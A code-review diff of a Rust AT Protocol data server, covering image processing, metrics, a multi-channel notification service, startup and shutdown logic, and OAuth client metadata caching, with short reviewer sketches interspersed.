crawlers: Arc<Crawlers>,
121
139
mut firehose_rx: broadcast::Receiver<SequencedEvent>,
···
127
145
crawlers = ?crawlers.crawler_urls,
128
146
"Starting crawlers notification service"
129
147
);
148
+
130
149
loop {
131
150
tokio::select! {
132
151
result = firehose_rx.recv() => {
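
Reviewer note: the request body sent by the spawned notification task sits outside this hunk. The sketch below is an assumption, not the PR's code: it presumes http_client is a reqwest::Client and that the body follows the com.atproto.sync.requestCrawl lexicon ({"hostname": ...}).

// Illustrative only: client type and body are not visible in the hunk.
async fn request_crawl(client: &reqwest::Client, crawler_url: &str, hostname: &str) -> reqwest::Result<()> {
    let url = format!("{}/xrpc/com.atproto.sync.requestCrawl", crawler_url.trim_end_matches('/'));
    client
        .post(&url)
        .json(&serde_json::json!({ "hostname": hostname }))
        .send()
        .await?
        .error_for_status()?;
    Ok(())
}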
+28
-1
src/image/mod.rs
···
1
1
use image::{DynamicImage, ImageFormat, ImageReader, imageops::FilterType};
2
2
use std::io::Cursor;
3
+
3
4
pub const THUMB_SIZE_FEED: u32 = 200;
4
5
pub const THUMB_SIZE_FULL: u32 = 1000;
6
+
5
7
#[derive(Debug, Clone)]
6
8
pub struct ProcessedImage {
7
9
pub data: Vec<u8>,
···
9
11
pub width: u32,
10
12
pub height: u32,
11
13
}
14
+
12
15
#[derive(Debug, Clone)]
13
16
pub struct ImageProcessingResult {
14
17
pub original: ProcessedImage,
15
18
pub thumbnail_feed: Option<ProcessedImage>,
16
19
pub thumbnail_full: Option<ProcessedImage>,
17
20
}
21
+
18
22
#[derive(Debug, thiserror::Error)]
19
23
pub enum ImageError {
20
24
#[error("Failed to decode image: {0}")]
···
32
36
#[error("File too large: {size} bytes exceeds maximum {max_size} bytes")]
33
37
FileTooLarge { size: usize, max_size: usize },
34
38
}
35
-
pub const DEFAULT_MAX_FILE_SIZE: usize = 10 * 1024 * 1024; // 10MB
39
+
40
+
pub const DEFAULT_MAX_FILE_SIZE: usize = 10 * 1024 * 1024;
41
+
36
42
pub struct ImageProcessor {
37
43
max_dimension: u32,
38
44
max_file_size: usize,
39
45
output_format: OutputFormat,
40
46
generate_thumbnails: bool,
41
47
}
48
+
42
49
#[derive(Debug, Clone, Copy)]
43
50
pub enum OutputFormat {
44
51
WebP,
···
46
53
Png,
47
54
Original,
48
55
}
56
+
49
57
impl Default for ImageProcessor {
50
58
fn default() -> Self {
51
59
Self {
···
56
64
}
57
65
}
58
66
}
67
+
59
68
impl ImageProcessor {
60
69
pub fn new() -> Self {
61
70
Self::default()
62
71
}
72
+
63
73
pub fn with_max_dimension(mut self, max: u32) -> Self {
64
74
self.max_dimension = max;
65
75
self
66
76
}
77
+
67
78
pub fn with_max_file_size(mut self, max: usize) -> Self {
68
79
self.max_file_size = max;
69
80
self
70
81
}
82
+
71
83
pub fn with_output_format(mut self, format: OutputFormat) -> Self {
72
84
self.output_format = format;
73
85
self
74
86
}
87
+
75
88
pub fn with_thumbnails(mut self, generate: bool) -> Self {
76
89
self.generate_thumbnails = generate;
77
90
self
78
91
}
92
+
79
93
pub fn process(&self, data: &[u8], mime_type: &str) -> Result<ImageProcessingResult, ImageError> {
80
94
if data.len() > self.max_file_size {
81
95
return Err(ImageError::FileTooLarge {
···
109
123
thumbnail_full,
110
124
})
111
125
}
126
+
112
127
fn detect_format(&self, mime_type: &str, data: &[u8]) -> Result<ImageFormat, ImageError> {
113
128
match mime_type.to_lowercase().as_str() {
114
129
"image/jpeg" | "image/jpg" => Ok(ImageFormat::Jpeg),
···
124
139
}
125
140
}
126
141
}
142
+
127
143
fn decode_image(&self, data: &[u8], format: ImageFormat) -> Result<DynamicImage, ImageError> {
128
144
let cursor = Cursor::new(data);
129
145
let reader = ImageReader::with_format(cursor, format);
···
131
147
.decode()
132
148
.map_err(|e| ImageError::DecodeError(e.to_string()))
133
149
}
150
+
134
151
fn encode_image(&self, img: &DynamicImage) -> Result<ProcessedImage, ImageError> {
135
152
let (data, mime_type) = match self.output_format {
136
153
OutputFormat::WebP => {
···
165
182
height: img.height(),
166
183
})
167
184
}
185
+
168
186
fn generate_thumbnail(&self, img: &DynamicImage, max_size: u32) -> Result<ProcessedImage, ImageError> {
169
187
let (orig_width, orig_height) = (img.width(), img.height());
170
188
let (new_width, new_height) = if orig_width > orig_height {
···
177
195
let thumb = img.resize(new_width, new_height, FilterType::Lanczos3);
178
196
self.encode_image(&thumb)
179
197
}
198
+
180
199
pub fn is_supported_mime_type(mime_type: &str) -> bool {
181
200
matches!(
182
201
mime_type.to_lowercase().as_str(),
183
202
"image/jpeg" | "image/jpg" | "image/png" | "image/gif" | "image/webp"
184
203
)
185
204
}
205
+
186
206
pub fn strip_exif(data: &[u8]) -> Result<Vec<u8>, ImageError> {
187
207
let format = image::guess_format(data)
188
208
.map_err(|e| ImageError::DecodeError(e.to_string()))?;
···
196
216
Ok(buf)
197
217
}
198
218
}
219
+
199
220
#[cfg(test)]
200
221
mod tests {
201
222
use super::*;
223
+
202
224
fn create_test_image(width: u32, height: u32) -> Vec<u8> {
203
225
let img = DynamicImage::new_rgb8(width, height);
204
226
let mut buf = Vec::new();
205
227
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap();
206
228
buf
207
229
}
230
+
208
231
#[test]
209
232
fn test_process_small_image() {
210
233
let processor = ImageProcessor::new();
···
213
236
assert!(result.thumbnail_feed.is_none());
214
237
assert!(result.thumbnail_full.is_none());
215
238
}
239
+
216
240
#[test]
217
241
fn test_process_large_image_generates_thumbnails() {
218
242
let processor = ImageProcessor::new();
···
227
251
assert!(full_thumb.width <= THUMB_SIZE_FULL);
228
252
assert!(full_thumb.height <= THUMB_SIZE_FULL);
229
253
}
254
+
230
255
#[test]
231
256
fn test_webp_conversion() {
232
257
let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP);
···
234
259
let result = processor.process(&data, "image/png").unwrap();
235
260
assert_eq!(result.original.mime_type, "image/webp");
236
261
}
262
+
237
263
#[test]
238
264
fn test_reject_too_large() {
239
265
let processor = ImageProcessor::new().with_max_dimension(1000);
···
241
267
let result = processor.process(&data, "image/png");
242
268
assert!(matches!(result, Err(ImageError::TooLarge { .. })));
243
269
}
270
+
244
271
#[test]
245
272
fn test_is_supported_mime_type() {
246
273
assert!(ImageProcessor::is_supported_mime_type("image/jpeg"));
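
Reviewer note: the dimension arithmetic inside generate_thumbnail is elided above. A common formulation that scales the longer edge down to max_size while preserving aspect ratio is sketched here for reference; it is illustrative and not necessarily the exact elided code (DynamicImage::resize itself also preserves aspect ratio within the bounds it is given, so the computed pair mainly fixes the bounding box).

// Illustrative aspect-ratio computation for a bounding box of max_size x max_size.
fn thumbnail_dims(orig_width: u32, orig_height: u32, max_size: u32) -> (u32, u32) {
    if orig_width <= max_size && orig_height <= max_size {
        return (orig_width, orig_height);
    }
    if orig_width > orig_height {
        let h = (orig_height as u64 * max_size as u64 / orig_width as u64) as u32;
        (max_size, h.max(1))
    } else {
        let w = (orig_width as u64 * max_size as u64 / orig_height as u64) as u32;
        (w.max(1), max_size)
    }
}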
+4
-1
src/lib.rs
···
16
16
pub mod sync;
17
17
pub mod util;
18
18
pub mod validation;
19
+
19
20
use axum::{
20
21
Router,
21
22
http::Method,
···
25
26
use state::AppState;
26
27
use tower_http::cors::{Any, CorsLayer};
27
28
use tower_http::services::{ServeDir, ServeFile};
29
+
28
30
pub fn app(state: AppState) -> Router {
29
31
let router = Router::new()
30
32
.route("/metrics", get(metrics::metrics_handler))
···
358
360
.route("/.well-known/did.json", get(api::identity::well_known_did))
359
361
.route("/.well-known/atproto-did", get(api::identity::well_known_atproto_did))
360
362
.route("/u/{handle}/did.json", get(api::identity::user_did_doc))
361
-
// OAuth 2.1 endpoints
362
363
.route(
363
364
"/.well-known/oauth-protected-resource",
364
365
get(oauth::endpoints::oauth_protected_resource),
···
402
403
.allow_headers(Any),
403
404
)
404
405
.with_state(state);
406
+
405
407
let frontend_dir = std::env::var("FRONTEND_DIR")
406
408
.unwrap_or_else(|_| "./frontend/dist".to_string());
409
+
407
410
if std::path::Path::new(&frontend_dir).join("index.html").exists() {
408
411
let index_path = format!("{}/index.html", frontend_dir);
409
412
let serve_dir = ServeDir::new(&frontend_dir)
+30
src/main.rs
···
6
6
use std::sync::Arc;
7
7
use tokio::sync::watch;
8
8
use tracing::{error, info, warn};
9
+
9
10
#[tokio::main]
10
11
async fn main() -> ExitCode {
11
12
dotenvy::dotenv().ok();
12
13
tracing_subscriber::fmt::init();
13
14
bspds::metrics::init_metrics();
15
+
14
16
match run().await {
15
17
Ok(()) => ExitCode::SUCCESS,
16
18
Err(e) => {
···
19
21
}
20
22
}
21
23
}
24
+
22
25
async fn run() -> Result<(), Box<dyn std::error::Error>> {
23
26
    let database_url = std::env::var("DATABASE_URL")
        .map_err(|_| "DATABASE_URL environment variable must be set")?;
+
    let max_connections: u32 = std::env::var("DATABASE_MAX_CONNECTIONS")
        .ok()
        .and_then(|v| v.parse().ok())
        .unwrap_or(100);
+
    let min_connections: u32 = std::env::var("DATABASE_MIN_CONNECTIONS")
        .ok()
        .and_then(|v| v.parse().ok())
        .unwrap_or(10);
+
    let acquire_timeout_secs: u64 = std::env::var("DATABASE_ACQUIRE_TIMEOUT_SECS")
        .ok()
        .and_then(|v| v.parse().ok())
        .unwrap_or(10);
+
    info!(
        "Configuring database pool: max={}, min={}, acquire_timeout={}s",
        max_connections, min_connections, acquire_timeout_secs
    );
+
    let pool = sqlx::postgres::PgPoolOptions::new()
        .max_connections(max_connections)
        .min_connections(min_connections)
···
        .connect(&database_url)
        .await
        .map_err(|e| format!("Failed to connect to Postgres: {}", e))?;
+
    sqlx::migrate!("./migrations")
        .run(&pool)
        .await
        .map_err(|e| format!("Failed to run migrations: {}", e))?;
+
    let state = AppState::new(pool.clone()).await;
    bspds::sync::listener::start_sequencer_listener(state.clone()).await;
+
    let (shutdown_tx, shutdown_rx) = watch::channel(false);
+
    let mut notification_service = NotificationService::new(pool);
+
    if let Some(email_sender) = EmailSender::from_env() {
        info!("Email notifications enabled");
        notification_service = notification_service.register_sender(email_sender);
    } else {
        warn!("Email notifications disabled (MAIL_FROM_ADDRESS not set)");
    }
+
    if let Some(discord_sender) = DiscordSender::from_env() {
        info!("Discord notifications enabled");
        notification_service = notification_service.register_sender(discord_sender);
    }
+
    if let Some(telegram_sender) = TelegramSender::from_env() {
        info!("Telegram notifications enabled");
        notification_service = notification_service.register_sender(telegram_sender);
    }
+
    if let Some(signal_sender) = SignalSender::from_env() {
        info!("Signal notifications enabled");
        notification_service = notification_service.register_sender(signal_sender);
    }
+
    let notification_handle = tokio::spawn(notification_service.run(shutdown_rx.clone()));
+
    let crawlers_handle = if let Some(crawlers) = Crawlers::from_env() {
        let crawlers = Arc::new(
            crawlers.with_circuit_breaker(state.circuit_breakers.relay_notification.clone())
···
        warn!("Crawlers notification service disabled (PDS_HOSTNAME or CRAWLERS not set)");
        None
    };
+
    let app = bspds::app(state);
    let addr = SocketAddr::from(([127, 0, 0, 1], 3000));
    info!("listening on {}", addr);
+
    let listener = tokio::net::TcpListener::bind(addr)
        .await
        .map_err(|e| format!("Failed to bind to {}: {}", addr, e))?;
+
    let server_result = axum::serve(listener, app)
        .with_graceful_shutdown(shutdown_signal(shutdown_tx))
        .await;
+
    notification_handle.await.ok();
+
    if let Some(handle) = crawlers_handle {
        handle.await.ok();
    }
+
    if let Err(e) = server_result {
        return Err(format!("Server error: {}", e).into());
    }
+
    Ok(())
}
+
async fn shutdown_signal(shutdown_tx: watch::Sender<bool>) {
    let ctrl_c = async {
        match tokio::signal::ctrl_c().await {
···
            }
        }
    };
+
    #[cfg(unix)]
    let terminate = async {
        match tokio::signal::unix::signal(tokio::signal::unix::SignalKind::terminate()) {
···
            }
        }
    };
+
    #[cfg(not(unix))]
    let terminate = std::future::pending::<()>();
+
    tokio::select! {
        _ = ctrl_c => {},
        _ = terminate => {},
    }
+
    info!("Shutdown signal received, stopping services...");
    shutdown_tx.send(true).ok();
}
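The `watch::channel(false)` created above is the single shutdown signal shared by the HTTP server, the notification service, and the crawlers task. A minimal sketch of the consumer side of such a channel (illustrative only; `NotificationService::run` and the crawlers task implement their own loops):

```rust
use std::time::Duration;
use tokio::sync::watch;

// Illustrative consumer of the shutdown channel: do periodic work until the
// sender publishes `true` (or is dropped), then return so the task can be joined.
async fn run_worker(mut shutdown: watch::Receiver<bool>) {
    let mut ticker = tokio::time::interval(Duration::from_secs(5));
    loop {
        tokio::select! {
            _ = ticker.tick() => {
                // one unit of periodic work goes here
            }
            changed = shutdown.changed() => {
                if changed.is_err() || *shutdown.borrow() {
                    break;
                }
            }
        }
    }
}
```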
+28 src/metrics.rs
···
use metrics_exporter_prometheus::{PrometheusBuilder, PrometheusHandle};
use std::sync::OnceLock;
use std::time::Instant;
+
static PROMETHEUS_HANDLE: OnceLock<PrometheusHandle> = OnceLock::new();
+
pub fn init_metrics() -> PrometheusHandle {
    let builder = PrometheusBuilder::new();
    let handle = builder
        .install_recorder()
        .expect("failed to install Prometheus recorder");
+
    PROMETHEUS_HANDLE.set(handle.clone()).ok();
    describe_metrics();
+
    handle
}
+
fn describe_metrics() {
    metrics::describe_counter!(
        "bspds_http_requests_total",
···
        "Database query duration in seconds"
    );
}
+
pub async fn metrics_handler() -> impl IntoResponse {
    match PROMETHEUS_HANDLE.get() {
        Some(handle) => {
···
        ),
    }
}
+
pub async fn metrics_middleware(request: Request<Body>, next: Next) -> Response {
    let start = Instant::now();
    let method = request.method().to_string();
    let path = normalize_path(request.uri().path());
+
    let response = next.run(request).await;
+
    let duration = start.elapsed().as_secs_f64();
    let status = response.status().as_u16().to_string();
+
    counter!(
        "bspds_http_requests_total",
        "method" => method.clone(),
···
        "status" => status.clone()
    )
    .increment(1);
+
    histogram!(
        "bspds_http_request_duration_seconds",
        "method" => method,
        "path" => path
    )
    .record(duration);
+
    response
}
+
fn normalize_path(path: &str) -> String {
    if path.starts_with("/xrpc/") {
        if let Some(method) = path.strip_prefix("/xrpc/") {
···
            return path.to_string();
        }
    }
+
    if path.starts_with("/u/") && path.ends_with("/did.json") {
        return "/u/{handle}/did.json".to_string();
    }
+
    if path.starts_with("/oauth/") {
        return path.to_string();
    }
+
    path.to_string()
}
+
pub fn record_auth_cache_hit(cache_type: &str) {
    counter!("bspds_auth_cache_hits_total", "cache_type" => cache_type.to_string()).increment(1);
}
+
pub fn record_auth_cache_miss(cache_type: &str) {
    counter!("bspds_auth_cache_misses_total", "cache_type" => cache_type.to_string()).increment(1);
}
+
pub fn set_firehose_subscribers(count: usize) {
    gauge!("bspds_firehose_subscribers").set(count as f64);
}
+
pub fn increment_firehose_subscribers() {
    counter!("bspds_firehose_events_total").increment(1);
}
+
pub fn record_firehose_event() {
    counter!("bspds_firehose_events_total").increment(1);
}
+
pub fn record_block_operation(op_type: &str) {
    counter!("bspds_block_operations_total", "op_type" => op_type.to_string()).increment(1);
}
+
pub fn record_s3_operation(op_type: &str, status: &str) {
    counter!(
        "bspds_s3_operations_total",
···
    )
    .increment(1);
}
+
pub fn set_notification_queue_size(size: usize) {
    gauge!("bspds_notification_queue_size").set(size as f64);
}
+
pub fn record_rate_limit_rejection(limiter: &str) {
    counter!("bspds_rate_limit_rejections_total", "limiter" => limiter.to_string()).increment(1);
}
+
pub fn record_db_query(query_type: &str, duration_seconds: f64) {
    counter!("bspds_db_queries_total", "query_type" => query_type.to_string()).increment(1);
    histogram!(
···
    )
    .record(duration_seconds);
}
+
#[cfg(test)]
mod tests {
    use super::*;
+
    #[test]
    fn test_normalize_path() {
        assert_eq!(
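`metrics_handler` serves the Prometheus exposition text and `metrics_middleware` records a request counter and a latency histogram per request. A sketch of how the two could be mounted on an axum router; the real wiring lives in `bspds::app`, so the route name and layering order here are assumptions:

```rust
use axum::{middleware, routing::get, Router};

// Hypothetical mount points; the real router is assembled in bspds::app().
fn with_metrics(router: Router) -> Router {
    router
        // expose the Prometheus text format
        .route("/metrics", get(metrics_handler))
        // count and time every request that passes through the router
        .layer(middleware::from_fn(metrics_middleware))
}
```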
+3 src/notifications/mod.rs
···
mod sender;
mod service;
mod types;
+
pub use sender::{
    DiscordSender, EmailSender, NotificationSender, SendError, SignalSender, TelegramSender,
    is_valid_phone_number, sanitize_header_value,
};
+
pub use service::{
    channel_display_name, enqueue_2fa_code, enqueue_account_deletion, enqueue_email_update,
    enqueue_email_verification, enqueue_notification, enqueue_password_reset,
    enqueue_plc_operation, enqueue_signup_verification, enqueue_welcome, NotificationService,
};
+
pub use types::{
    NewNotification, NotificationChannel, NotificationStatus, NotificationType, QueuedNotification,
};
+30 src/notifications/sender.rs
···
use std::time::Duration;
use tokio::io::AsyncWriteExt;
use tokio::process::Command;
+
use super::types::{NotificationChannel, QueuedNotification};
+
const HTTP_TIMEOUT_SECS: u64 = 30;
const MAX_RETRIES: u32 = 3;
const INITIAL_RETRY_DELAY_MS: u64 = 500;
+
#[async_trait]
pub trait NotificationSender: Send + Sync {
    fn channel(&self) -> NotificationChannel;
    async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError>;
}
+
#[derive(Debug, thiserror::Error)]
pub enum SendError {
    #[error("Failed to spawn sendmail process: {0}")]
···
    #[error("Max retries exceeded: {0}")]
    MaxRetriesExceeded(String),
}
+
fn create_http_client() -> Client {
    Client::builder()
        .timeout(Duration::from_secs(HTTP_TIMEOUT_SECS))
···
        .build()
        .unwrap_or_else(|_| Client::new())
}
+
fn is_retryable_status(status: reqwest::StatusCode) -> bool {
    status.is_server_error() || status == reqwest::StatusCode::TOO_MANY_REQUESTS
}
+
async fn retry_delay(attempt: u32) {
    let delay_ms = INITIAL_RETRY_DELAY_MS * 2u64.pow(attempt);
    tokio::time::sleep(Duration::from_millis(delay_ms)).await;
}
+
pub fn sanitize_header_value(value: &str) -> String {
    value.replace(['\r', '\n'], " ").trim().to_string()
}
+
pub fn is_valid_phone_number(number: &str) -> bool {
    if number.len() < 2 || number.len() > 20 {
        return false;
···
    let remaining: String = chars.collect();
    !remaining.is_empty() && remaining.chars().all(|c| c.is_ascii_digit())
}
+
pub struct EmailSender {
    from_address: String,
    from_name: String,
    sendmail_path: String,
}
+
impl EmailSender {
    pub fn new(from_address: String, from_name: String) -> Self {
        Self {
···
            sendmail_path: std::env::var("SENDMAIL_PATH").unwrap_or_else(|_| "/usr/sbin/sendmail".to_string()),
        }
    }
+
    pub fn from_env() -> Option<Self> {
        let from_address = std::env::var("MAIL_FROM_ADDRESS").ok()?;
        let from_name = std::env::var("MAIL_FROM_NAME").unwrap_or_else(|_| "BSPDS".to_string());
        Some(Self::new(from_address, from_name))
    }
+
    pub fn format_email(&self, notification: &QueuedNotification) -> String {
        let subject = sanitize_header_value(notification.subject.as_deref().unwrap_or("Notification"));
        let recipient = sanitize_header_value(&notification.recipient);
···
        )
    }
}
+
#[async_trait]
impl NotificationSender for EmailSender {
    fn channel(&self) -> NotificationChannel {
        NotificationChannel::Email
    }
+
    async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
        let email_content = self.format_email(notification);
        let mut child = Command::new(&self.sendmail_path)
···
        Ok(())
    }
}
+
pub struct DiscordSender {
    webhook_url: String,
    http_client: Client,
}
+
impl DiscordSender {
    pub fn new(webhook_url: String) -> Self {
        Self {
···
            http_client: create_http_client(),
        }
    }
+
    pub fn from_env() -> Option<Self> {
        let webhook_url = std::env::var("DISCORD_WEBHOOK_URL").ok()?;
        Some(Self::new(webhook_url))
    }
}
+
#[async_trait]
impl NotificationSender for DiscordSender {
    fn channel(&self) -> NotificationChannel {
        NotificationChannel::Discord
    }
+
    async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
        let subject = notification.subject.as_deref().unwrap_or("Notification");
        let content = format!("**{}**\n\n{}", subject, notification.body);
···
        ))
    }
}
+
pub struct TelegramSender {
    bot_token: String,
    http_client: Client,
}
+
impl TelegramSender {
    pub fn new(bot_token: String) -> Self {
        Self {
···
            http_client: create_http_client(),
        }
    }
+
    pub fn from_env() -> Option<Self> {
        let bot_token = std::env::var("TELEGRAM_BOT_TOKEN").ok()?;
        Some(Self::new(bot_token))
    }
}
+
#[async_trait]
impl NotificationSender for TelegramSender {
    fn channel(&self) -> NotificationChannel {
        NotificationChannel::Telegram
    }
+
    async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
        let chat_id = &notification.recipient;
        let subject = notification.subject.as_deref().unwrap_or("Notification");
···
        ))
    }
}
+
pub struct SignalSender {
    signal_cli_path: String,
    sender_number: String,
}
+
impl SignalSender {
    pub fn new(signal_cli_path: String, sender_number: String) -> Self {
        Self {
···
            sender_number,
        }
    }
+
    pub fn from_env() -> Option<Self> {
        let signal_cli_path = std::env::var("SIGNAL_CLI_PATH")
            .unwrap_or_else(|_| "/usr/local/bin/signal-cli".to_string());
···
        Some(Self::new(signal_cli_path, sender_number))
    }
}
+
#[async_trait]
impl NotificationSender for SignalSender {
    fn channel(&self) -> NotificationChannel {
        NotificationChannel::Signal
    }
+
    async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
        let recipient = &notification.recipient;
        if !is_valid_phone_number(recipient) {
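The HTTP-based senders share `MAX_RETRIES`, `INITIAL_RETRY_DELAY_MS`, `retry_delay`, and `is_retryable_status`. A standalone sketch of the retry shape these helpers imply; each sender above builds its own request and maps failures to its own `SendError` variants, so the error mapping here is illustrative only:

```rust
// Illustrative retry loop: retry on 5xx/429 with exponential backoff, give up otherwise.
async fn post_with_retry(
    client: &reqwest::Client,
    url: &str,
    body: String,
) -> Result<(), SendError> {
    let mut last_error = String::new();
    for attempt in 0..MAX_RETRIES {
        match client.post(url).body(body.clone()).send().await {
            Ok(resp) if resp.status().is_success() => return Ok(()),
            Ok(resp) if is_retryable_status(resp.status()) => {
                last_error = format!("HTTP {}", resp.status());
            }
            Ok(resp) => return Err(SendError::MaxRetriesExceeded(format!("HTTP {}", resp.status()))),
            Err(e) => last_error = e.to_string(),
        }
        // 500 ms, 1 s, 2 s ... (INITIAL_RETRY_DELAY_MS * 2^attempt)
        retry_delay(attempt).await;
    }
    Err(SendError::MaxRetriesExceeded(last_error))
}
```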
+27 src/notifications/service.rs
···
use std::collections::HashMap;
use std::sync::Arc;
use std::time::Duration;
+
use chrono::Utc;
use sqlx::PgPool;
use tokio::sync::watch;
use tokio::time::interval;
use tracing::{debug, error, info, warn};
use uuid::Uuid;
+
use super::sender::{NotificationSender, SendError};
use super::types::{NewNotification, NotificationChannel, NotificationStatus, QueuedNotification};
+
pub struct NotificationService {
    db: PgPool,
    senders: HashMap<NotificationChannel, Arc<dyn NotificationSender>>,
    poll_interval: Duration,
    batch_size: i64,
}
+
impl NotificationService {
    pub fn new(db: PgPool) -> Self {
        let poll_interval_ms: u64 = std::env::var("NOTIFICATION_POLL_INTERVAL_MS")
···
            batch_size,
        }
    }
+
    pub fn with_poll_interval(mut self, interval: Duration) -> Self {
        self.poll_interval = interval;
        self
    }
+
    pub fn with_batch_size(mut self, size: i64) -> Self {
        self.batch_size = size;
        self
    }
+
    pub fn register_sender<S: NotificationSender + 'static>(mut self, sender: S) -> Self {
        self.senders.insert(sender.channel(), Arc::new(sender));
        self
    }
+
    pub async fn enqueue(&self, notification: NewNotification) -> Result<Uuid, sqlx::Error> {
        let id = sqlx::query_scalar!(
            r#"
···
        debug!(notification_id = %id, "Notification enqueued");
        Ok(id)
    }
+
    pub fn has_senders(&self) -> bool {
        !self.senders.is_empty()
    }
+
    pub async fn run(self, mut shutdown: watch::Receiver<bool>) {
        if self.senders.is_empty() {
            warn!("Notification service starting with no senders configured. Notifications will be queued but not delivered until senders are configured.");
···
            }
        }
    }
+
    async fn process_batch(&self) -> Result<(), sqlx::Error> {
        let notifications = self.fetch_pending_notifications().await?;
        if notifications.is_empty() {
···
        }
        Ok(())
    }
+
    async fn fetch_pending_notifications(&self) -> Result<Vec<QueuedNotification>, sqlx::Error> {
        let now = Utc::now();
        sqlx::query_as!(
···
        .fetch_all(&self.db)
        .await
    }
+
    async fn process_notification(&self, notification: QueuedNotification) {
        let notification_id = notification.id;
        let channel = notification.channel;
···
            }
        }
    }
+
    async fn mark_sent(&self, id: Uuid) -> Result<(), sqlx::Error> {
        sqlx::query!(
            r#"
···
        .await?;
        Ok(())
    }
+
    async fn mark_failed(&self, id: Uuid, error: &str) -> Result<(), sqlx::Error> {
        sqlx::query!(
            r#"
···
        Ok(())
    }
}
+
pub async fn enqueue_notification(db: &PgPool, notification: NewNotification) -> Result<Uuid, sqlx::Error> {
    sqlx::query_scalar!(
        r#"
···
    .fetch_one(db)
    .await
}
+
pub struct UserNotificationPrefs {
    pub channel: NotificationChannel,
    pub email: Option<String>,
    pub handle: String,
}
+
pub async fn get_user_notification_prefs(
    db: &PgPool,
    user_id: Uuid,
···
        handle: row.handle,
    })
}
+
pub async fn enqueue_welcome(
    db: &PgPool,
    user_id: Uuid,
···
    )
    .await
}
+
pub async fn enqueue_email_verification(
    db: &PgPool,
    user_id: Uuid,
···
    )
    .await
}
+
pub async fn enqueue_password_reset(
    db: &PgPool,
    user_id: Uuid,
···
    )
    .await
}
+
pub async fn enqueue_email_update(
    db: &PgPool,
    user_id: Uuid,
···
    )
    .await
}
+
pub async fn enqueue_account_deletion(
    db: &PgPool,
    user_id: Uuid,
···
    )
    .await
}
+
pub async fn enqueue_plc_operation(
    db: &PgPool,
    user_id: Uuid,
···
    )
    .await
}
+
pub async fn enqueue_2fa_code(
    db: &PgPool,
    user_id: Uuid,
···
    )
    .await
}
+
pub fn channel_display_name(channel: NotificationChannel) -> &'static str {
    match channel {
        NotificationChannel::Email => "email",
···
        NotificationChannel::Signal => "Signal",
    }
}
+
pub async fn enqueue_signup_verification(
    db: &PgPool,
    user_id: Uuid,
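Putting the pieces together: the service is assembled with the builder methods above and driven by a spawned task that watches the same shutdown channel as `main`. A sketch with illustrative values (the defaults normally come from `NOTIFICATION_POLL_INTERVAL_MS` and the environment); call it from inside the Tokio runtime:

```rust
use std::time::Duration;
use tokio::sync::watch;

// Illustrative assembly, mirroring what main() does; interval and batch size
// are example values, not the environment-derived defaults.
fn spawn_notifications(pool: sqlx::PgPool) -> (watch::Sender<bool>, tokio::task::JoinHandle<()>) {
    let (shutdown_tx, shutdown_rx) = watch::channel(false);
    let mut service = NotificationService::new(pool)
        .with_poll_interval(Duration::from_secs(2))
        .with_batch_size(50);
    if let Some(email) = EmailSender::from_env() {
        service = service.register_sender(email);
    }
    let handle = tokio::spawn(service.run(shutdown_rx));
    (shutdown_tx, handle)
}
```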
+7 src/notifications/types.rs
···
use serde::{Deserialize, Serialize};
use sqlx::FromRow;
use uuid::Uuid;
+
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, sqlx::Type, Serialize, Deserialize)]
#[sqlx(type_name = "notification_channel", rename_all = "lowercase")]
pub enum NotificationChannel {
···
    Telegram,
    Signal,
}
+
#[derive(Debug, Clone, Copy, PartialEq, Eq, sqlx::Type, Serialize, Deserialize)]
#[sqlx(type_name = "notification_status", rename_all = "lowercase")]
pub enum NotificationStatus {
···
    Sent,
    Failed,
}
+
#[derive(Debug, Clone, Copy, PartialEq, Eq, sqlx::Type, Serialize, Deserialize)]
#[sqlx(type_name = "notification_type", rename_all = "snake_case")]
pub enum NotificationType {
···
    PlcOperation,
    TwoFactorCode,
}
+
#[derive(Debug, Clone, FromRow)]
pub struct QueuedNotification {
    pub id: Uuid,
···
    pub scheduled_for: DateTime<Utc>,
    pub processed_at: Option<DateTime<Utc>>,
}
+
pub struct NewNotification {
    pub user_id: Uuid,
    pub channel: NotificationChannel,
···
    pub body: String,
    pub metadata: Option<serde_json::Value>,
}
+
impl NewNotification {
    pub fn new(
        user_id: Uuid,
···
            metadata: None,
        }
    }
+
    pub fn email(
        user_id: Uuid,
        notification_type: NotificationType,
+22 src/oauth/client.rs
···
use std::collections::HashMap;
use std::sync::Arc;
use tokio::sync::RwLock;
+
use super::OAuthError;
+
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct ClientMetadata {
    pub client_id: String,
···
    #[serde(skip_serializing_if = "Option::is_none")]
    pub application_type: Option<String>,
}
+
impl Default for ClientMetadata {
    fn default() -> Self {
        Self {
···
        }
    }
}
+
#[derive(Clone)]
pub struct ClientMetadataCache {
    cache: Arc<RwLock<HashMap<String, CachedMetadata>>>,
···
    http_client: Client,
    cache_ttl_secs: u64,
}
+
struct CachedMetadata {
    metadata: ClientMetadata,
    cached_at: std::time::Instant,
}
+
struct CachedJwks {
    jwks: serde_json::Value,
    cached_at: std::time::Instant,
}
+
impl ClientMetadataCache {
    pub fn new(cache_ttl_secs: u64) -> Self {
        Self {
···
            cache_ttl_secs,
        }
    }
+
    pub async fn get(&self, client_id: &str) -> Result<ClientMetadata, OAuthError> {
        {
            let cache = self.cache.read().await;
···
        }
        Ok(metadata)
    }
+
    pub async fn get_jwks(&self, metadata: &ClientMetadata) -> Result<serde_json::Value, OAuthError> {
        if let Some(jwks) = &metadata.jwks {
            return Ok(jwks.clone());
···
        }
        Ok(jwks)
    }
+
    async fn fetch_jwks(&self, jwks_uri: &str) -> Result<serde_json::Value, OAuthError> {
        if !jwks_uri.starts_with("https://") {
            if !jwks_uri.starts_with("http://")
···
        }
        Ok(jwks)
    }
+
    async fn fetch_metadata(&self, client_id: &str) -> Result<ClientMetadata, OAuthError> {
        if !client_id.starts_with("http://") && !client_id.starts_with("https://") {
            return Err(OAuthError::InvalidClient(
···
        self.validate_metadata(&metadata)?;
        Ok(metadata)
    }
+
    fn validate_metadata(&self, metadata: &ClientMetadata) -> Result<(), OAuthError> {
        if metadata.redirect_uris.is_empty() {
            return Err(OAuthError::InvalidClient(
···
        }
        Ok(())
    }
+
    pub fn validate_redirect_uri(
        &self,
